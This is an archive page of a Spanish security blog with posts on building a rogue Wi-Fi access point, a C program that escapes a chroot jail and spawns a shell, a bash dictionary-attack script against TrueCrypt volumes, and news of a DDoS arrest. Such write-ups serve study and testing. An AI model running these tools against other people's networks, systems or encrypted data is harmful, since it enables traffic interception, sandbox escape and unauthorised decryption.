Archive

Archive for the ‘Ataques’ Category

HowTo: Rogue AP

March 30th, 2011 No comments

Con este post pretendo despejar posibles dudas que han podido surgir tras leer los artículos anteriores sobre cómo montar un punto de acceso falso (Rogue AP) sobre DNS , DHCP, etc.

Para comenzar, necesitaremos una interface en modo monitor así que la creamos con airmon-ng o con iw, como más os guste (aunque viene a ser lo mismo).

[email protected]:~$ cd /tmp/
[email protected]:/tmp$ wget -c 'http://wireless.kernel.org/download/iw/iw-0.9.22.tar.bz2'
--2011-03-29 22:00:58--  http://wireless.kernel.org/download/iw/iw-0.9.22.tar.bz2
Resolviendo wireless.kernel.org... 78.46.109.217
Connecting to wireless.kernel.org|78.46.109.217|:80... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 50526 (49K) [application/octet-stream]
Saving to: `iw-0.9.22.tar.bz2'

100%[===================================================================================================================================================================================================>] 50.526       233K/s   in 0,2s

2011-03-29 22:00:59 (233 KB/s) - `iw-0.9.22.tar.bz2' saved [50526/50526]

[email protected]:/tmp$ tar xf iw-0.9.22.tar.bz2
[email protected]:/tmp$ cd iw-0.9.22/
[email protected]:/tmp/iw-0.9.22$ make clean && make
CC   iw.o
CC   genl.o
CC   event.o
CC   info.o
CC   phy.o
CC   interface.o
CC   ibss.o
CC   station.o
CC   survey.o
CC   util.o
CC   mesh.o
CC   mpath.o
CC   scan.o
CC   reg.o
GEN  version.c
CC   version.o
CC   reason.o
CC   status.o
CC   connect.o
CC   link.o
CC   offch.o
CC   ps.o
CC   cqm.o
CC   bitrate.o
CC   sections.o
CC   iw
[email protected]:/tmp/iw-0.9.22$ sudo make install
GZIP iw.8
INST iw
INST iw.8
[email protected]:/tmp/iw-0.9.22$

Ahora vamos a instalar el servidor DHCP y realizaremos una configuración básica, con esto conseguiremos que los clientes obtengan los datos de red de forma automática al realizar una petición DHCP.

Para no complicarnos y dado que todo esto lo estoy realizando sobre Debian, instalaremos el servidor DHCP desde los repositorios, instala el que más te guste, en mi caso tengo instalado “isc-dhcp-server“:

[email protected]:/tmp/iw-0.9.22$ apt-cache search dhcp | grep -i server
bootp - server for the bootp protocol with DHCP support
udhcpd - Provides the busybox DHCP server implementation
dhcp-probe - network DHCP or BootP server discover
dhis-server - Dynamic Host Information System - server
dnsmasq-base - A small caching DNS proxy and DHCP/TFTP server
dnsmasq - A small caching DNS proxy and DHCP/TFTP server
gadmintools - GTK+ server administration tools (meta-package)
dhcp3-server - ISC DHCP server (transitional package)
isc-dhcp-server-dbg - ISC DHCP server for automatic IP address assignment (debug)
isc-dhcp-server-ldap - DHCP server able to use LDAP as backend
isc-dhcp-server - ISC DHCP server for automatic IP address assignment
ltsp-server-standalone - complete LTSP server environment
python-pydhcplib - Python DHCP client/server library
resolvconf - name server information handler
wide-dhcpv6-server - DHCPv6 server for automatic IPv6 hosts configuration
dibbler-server - Servidor de DHCPv6 adaptable
[email protected]:/tmp/iw-0.9.22$

Una vez instalado, si solo queremos usarlo para casos puntuales y evitar que esté siempre corriendo:

[email protected]:/tmp/iw-0.9.22$ sudo update-rc.d -f isc-dhcp-server remove

La configuración que vamos a usar para el DHCP es la siguiente:

ddns-update-style none;
ignore client-updates; # ignoramos peticiones de actualizacion DDNS de los clientes
authoritative; # servidor maestro de dhcp
default-lease-time 86400; # 24 horas (tiempo de "vida" de la IP asignada al cliente)
max-lease-time 172800; # 48 horas (tiempo de "vida" maximo de la IP asignada al cliente)

subnet 192.168.3.0 netmask 255.255.255.0
{
option routers 192.168.3.1; # router de la red
option broadcast-address 192.168.3.255; # direccion broadcast
option domain-name-servers 80.58.61.250,80.58.61.254; # DNS para los clientes
range 192.168.3.33 192.168.3.254; # rango de IPs permitidas
allow unknown-clients; # no filtramos clientes asi que no seria necesario, pero asi no se olvida
}

Esta es la configuración mínima recomendable que debemos tener para poder ofrecer DHCP a los clientes, podríamos crear diferentes “pools” con otros servidores DNS, filtrar por dirección MAC, fabricante, y un largo etcétera que no nos es vital para la ocasión, el que quiera ampliar un poco más: http://www.isc.org/software/dhcp/documentation

Ahora crearemos la interface en modo monitor para ofrecer el AP:

[email protected]:/tmp/iw-0.9.22$ sudo iw dev wlan0 interface add wifi0 type monitor

wlan0 es el nombre de la interface sobre la que vamos a crear la interface virtual wifi0 en modo monitor.

[email protected]:/tmp/iw-0.9.22$ sudo iwconfig wifi0
wifi0     IEEE 802.11bg  Mode:Monitor  Frequency:2.462 GHz  Tx-Power=15 dBm
Retry  long limit:7   RTS thr:off   Fragment thr:off
Power Management:off

[email protected]:/tmp/iw-0.9.22$

Hecho esto, lanzamos airbase-ng para anunciar nuestro AP:

[email protected]:/tmp/iw-0.9.22$ sudo airbase-ng -w abcdef0123 -y -I 50 wifi0 --essid SafetyBits
22:46:14  Created tap interface at0
22:46:14  Trying to set MTU on at0 to 1500
22:46:14  Trying to set MTU on wifi0 to 1800
22:46:14  Access Point with BSSID 00:80:5A:4D:9B:10 started.

Con lo cual, solo creamos un AP con essid “SafetyBits“, con clave WEPabcdef0123“, a través de la interface wifi0 y mediante la opción “-y” le indicamos que no responda a “broadcast probes” y con “-I” le indicamos el intervalo de tiempo en milisegundos para enviar los beacons.

En este caso no he especificado el canal, ya que al estar operando sobre wlan0 que está conectada a otra red, el canal ya está establecido.

Ahora desde otro terminal ejecutamos:

[email protected]:~$ sudo ifconfig at0 192.168.3.1 netmask 255.255.255.0 up
[email protected]:~$ sudo dhcpd at0

En el último comando no le especifico la ruta al fichero de configuración “dhcpd.conf” porque se encuentra en la ruta por defecto (“/etc/dhcp/dhcpd.conf“).

A continuación, vamos a configurar iptables con una política por defecto DROP en INPUT/OUTPUT/FORWARD para que se vea más claro cómo tenemos que gestionar el tráfico:

#!/bin/bash

AP_RED='192.168.3.0/24'
AP_IFACE='at0'
INET_IFACE='wlan0'

#Limpiamos las reglas previas
iptables -F
iptables -X
iptables -Z
iptables -t nat -F

#Politica para denegar todo por defecto
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP

# Permitimos todo en local
iptables -A INPUT -i lo -d $LOOP -j ACCEPT
iptables -A OUTPUT -o lo -s $LOOP -j ACCEPT

# Permitimos todo en at0
iptables -A INPUT -i $AP_IFACE -j ACCEPT
iptables -A OUTPUT -o $AP_IFACE -j ACCEPT

# Permitimos forwarding en la subred del AP
iptables -A FORWARD -s $AP_RED -i $AP_IFACE -o $INET_IFACE -j ACCEPT
iptables -A FORWARD -d $AP_RED -o $AP_IFACE -i $INET_IFACE -j ACCEPT

# Enmascaramos la subred del AP con la interface conectada a internet
iptables -t nat -A POSTROUTING -s $AP_RED -o $INET_IFACE -j MASQUERADE

# Como por defecto hacemos DROP, permitimos todo en $INET_IFACE
iptables -A INPUT -i $INET_IFACE -j ACCEPT
iptables -A OUTPUT -o $INET_IFACE -j ACCEPT

unset AP_RED AP_IFACE INET_IFACE

exit 0

Este listado de reglas pisarán a las que se tengan previamente, así que si tienes alguna regla en el equipo debes modificar el listado anterior e integrarlas con las que tengas, y cuidado con el orden en que se establecen, que no es lo mismo “meter a tu novia en un barco” que “meter un barco en tu novia” :-p

Siguiendo con la línea, que no se olvide activar el forwarding:

sudo sysctl -w net.ipv4.ip_forward=1

Antes indicamos cómo evitar que el servidor DHCP se iniciase en cada inicio del sistema, pero si por el contrario esto es lo que queremos, debemos agregar las interfaces en las que se deben escuchar las peticiones en “/etc/default/isc-dhcp-server” y configurar manualmente los datos de la interface en “/etc/network/interfaces“.

Y eso es todo, las peticiones DNS de los clientes serán enviadas a los servidores que hemos espeficicado en el archivo “dhcpd.conf“.

Otros links:

Bypassing Chroot

March 3rd, 2010 No comments

Con la excusa de llevar mucho tiempo sin escribir ninguna entrada, aprovecho para decir que ya se ha inaugurado el blog de elhacker.net (blog.elhacker.net).

La primera entrada, de la mano de Kamsky habla sobre jaulas chroot, y algunos métodos para saltarnos esta medida de prevención.

El artículo original: http://blog.elhacker.net/2010/03/jaulas-chroot.html

Aquí adjunto el código retocado para salir del chroot siendo root:

/*
Chema Garcia (a.k.a. sch3m4)

[email protected]

http://safetybits.net

*/

#include <stdlib.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>
#include <pwd.h>

#define FOLDER      "chbrk"
#define PERM        0700
#define MAX_CHDIR   200

#define SHELL       "/bin/sh"

int main()
{
    int           fd;
    struct stat   statf;
    ino_t         aux;
    unsigned int  cont;
    struct passwd *owner;
    char          *directory;

    if(getuid()!=0)
    {
        fprintf(stderr,"\nThis program cannot work without root privileges\n");
        return -1;
    }

    fd=open(".",O_RDONLY);
    mkdir(FOLDER,PERM);
    chroot(FOLDER);
    fchdir(fd);
    close(fd);

    aux=0;
    cont=0;
    while(!stat(".",&statf) && aux!=statf.st_ino && cont++ < MAX_CHDIR)
    {
        aux=statf.st_ino;
        chdir("..");
    }

    if(aux==statf.st_ino)
    {
        chroot(".");
        owner=getpwuid(statf.st_uid);

        directory=getcwd(0,0);
        fprintf(stderr,"\n+=[ Done! ]=+\n");
        fprintf(stderr,"\n+ Directory:  %s",directory);
        fprintf(stderr,"\n+ Inode:      %d",(int)statf.st_ino);
        fprintf(stderr,"\n+ Owner:      id=%d (%s) / gid=%d \n\n",owner->pw_uid,owner->pw_name,owner->pw_gid);
        free(directory);

        execl(SHELL,(char*)0,(char*)0);
    }

   return 0;
}

Y la url a pastebin: http://pastebin.com/su0wsDer

Categories: Ataques, C/C++, GNU/Linux, Programacion, Seguridad Tags:

Crackeando volúmenes de TrueCrypt

December 20th, 2009 1 comment

TrueCrypt como ya sabrán, es una aplicación que permite crear volúmenes virtuales cifrados y ocultos en otros volúmenes.

Y es que todo eso de cifrar y ocultar la información que bajo nuestro punto de vista puede ser sensible, de manera que solo nosotros sabemos cómo acceder a dichos datos está muy bien, y sí que es cierto que se nos da el caso de que realmente hay que proteger cierta información (una buena combinación es TrueCrypt + PGP), pero tarde o temprano es intevitable terminar como la siguiente ilustración, y que el botón “Forgot your password?” se convierta en nuestro mejor aliado:

En el caso del botón, todo está solucionado, rellenamos un formulario y listo (si nos acordamos de los datos del registro, claro), pero en el caso de TrueCrypt… ¿Dónde está el botón? Personalmente soy muy dado a olvidar las claves así que suelo tener varias copias de seguridad de un fichero con todas mis credenciales cifrado con PGP, pero como siempre hay algo que puede fallar, y fallará, el problema era que en ese archivo, no estaban todas las claves.

Así que necesitaba acceder a un volumen cifrado con TrueCrypt, por lo que me puse a buscar herramientas para automatizar el crackeo, y solo me encuentro con aplicaciones de pago, porciones de código y alguna que otra aplicación que dice  funcionar pero de fuentes nada fiables. Así que me dispuse a aplicar la filosofía del DIY (o para los menos avispados, Do It Yourself) e hice el script para crackear el volumen. Pero claro, como siempre el problema de los ataques por diccionario es el propio diccionario, ya que la clave rondaba los 100 caracteres, así que generé un diccionario a partir de los caracteres que recordaba, y pude acceder a los datos.

El script es muy simple, se limita a leer las posibles claves del diccionario y lanza directamente el TrueCrypt para tratar de montar el volumen usando dicha clave. Obviamente no es para nada eficiente, y si no conocemos ningún patrón de la clave, no es factible el ataque cuando uno ve datos como este:

# time truecrypt –text –non-interactive –mount –mount-options=ro  –filesystem=none -p “laclave” ./volumen
Error: Incorrect password or not a TrueCrypt volume.

real    0m2.078s
user    0m0.144s
sys     0m0.008s

Aunque ya que el código de TrueCrypt lo podemos descargar de la página oficial, se podría modificar para que el ataque fuese más eficiente.

#!/bin/bash
#

echo -e "\n"
echo -e "############################"
echo -e "#                          #"
echo -e "#        ~ SafetyBits ~       #"
echo -e "#                          #"
echo -e "# Simple TrueCrypt Cracker #"
echo -e "#          v0.1b           #"
echo -e "#                          #"
echo -e "# ~~~~~~~~~~~~~~~~~~~~~~~  #"
echo -e "#                          #"
echo -e "# Written by: Chema Garcia #"
echo -e "#        [email protected] #"
echo -e "#        http://safetybits.net #"
echo -e "#                          #"
echo -e "############################"

if [ ! $# -eq 2 ]
then
 echo -e "\nUse: $0 <volume_path> <dictionary>\n"
 exit 0
fi

TRUECRYPT="`which truecrypt`"
if [ `echo $TRUECRYPT | grep -c "^/"` -eq 0 ]
then
 echo -e "\n[!] 'truecrypt' not found!\n"
 exit 1
fi

IFSaux="$IFS"
IFS="
"

echo -e "\n[+] Started!\n"
for i in `cat $2`
do
 RES="`$TRUECRYPT --text --non-interactive --mount --mount-options=ro --filesystem=none -p "$i" "$1" 2>&1`"

 if [ $? -eq 0 ]
 then
  echo -e "\n[+] KEY FOUND! ==> $i\n"
  $TRUECRYPT --text --non-interactive --volume-properties "$1"

  echo -e "[+] Demounting...\c"
  $TRUECRYPT --text --non-interactive -d "$1"
  echo "OK"

  break
 elif [ `echo "$RES" | grep -ic "create ioctl failed"` -ge 1 ]
 then
  echo -e "\n[+] POSSIBLE KEY FOUND! ==> $i"
  echo -e "\t- Still working..."
 fi

done

IFS="$IFSaux"

echo -e "\n[+] Finished!\n"

unset IFSaux RES TRUECRYPT i
exit 0

Detenido un menor de edad por ataques DDoS

November 27th, 2009 No comments

El menor, un autodidacta informático, consiguió evadir protocolos de seguridad considerados como infranqueables.

Tras controlar más de 75.000 ordenadores repartidos por todo el mundo de internautas, lanzó un ataque masivo de más de doce millones de visitas, a una página web prestigiosa de la seguridad informática

“No sabemos” a qué se refieren exáctamente con eso de “(…)evadir protocolos de seguridad considerados como infranqueables.”, pero aun así, felicitar a la Guardia Civil por su trabajo en la operación “CANDELARIA”.

http://www.guardiacivil.org/prensa/notas/win_noticia.jsp?idnoticia=2724

https://foro.elhacker.net/noticias/un_menor_de_edad_imputado_en_un_ataque_masivo_contra_el_sitio_elhackernet-t275900.0.html

http://meneame.net/story/imputado-hacker-16-anos-habia-infectado-mas-75.000-ordenadores

http://elladodelmal.blogspot.com/2009/11/imputado-por-un-ddos-el-hackernet.html

http://www.elmundo.es/elmundo/2009/11/26/navegante/1259238023.html

http://www.europapress.es/islas-canarias/noticia-menor-detenido-tenerife-presunto-autor-ataque-informatico-20091126162644.html

http://www.abc.es/20091126/nacional-islas-baleares/menor-tenerife-imputado-ataque-200911261636.html

http://www.elpais.com/articulo/sociedad/hacker/anos/ataca/75000/ordenadores/elpepusoc/20091126elpepusoc_10/Tes

http://www.20minutos.es/noticia/575229/0/ataque/informatico/ordenadores/

http://www.publico.es/agencias/efe/273108/imputado/hacker/anos/infectado/ordenadores

http://www.elmundo.es/elmundo/2009/11/26/navegante/1259238023.html

Ni que decir tiene que el virus usado no era nada del otro mundo.

Categories: Ataques, General, Seguridad Tags: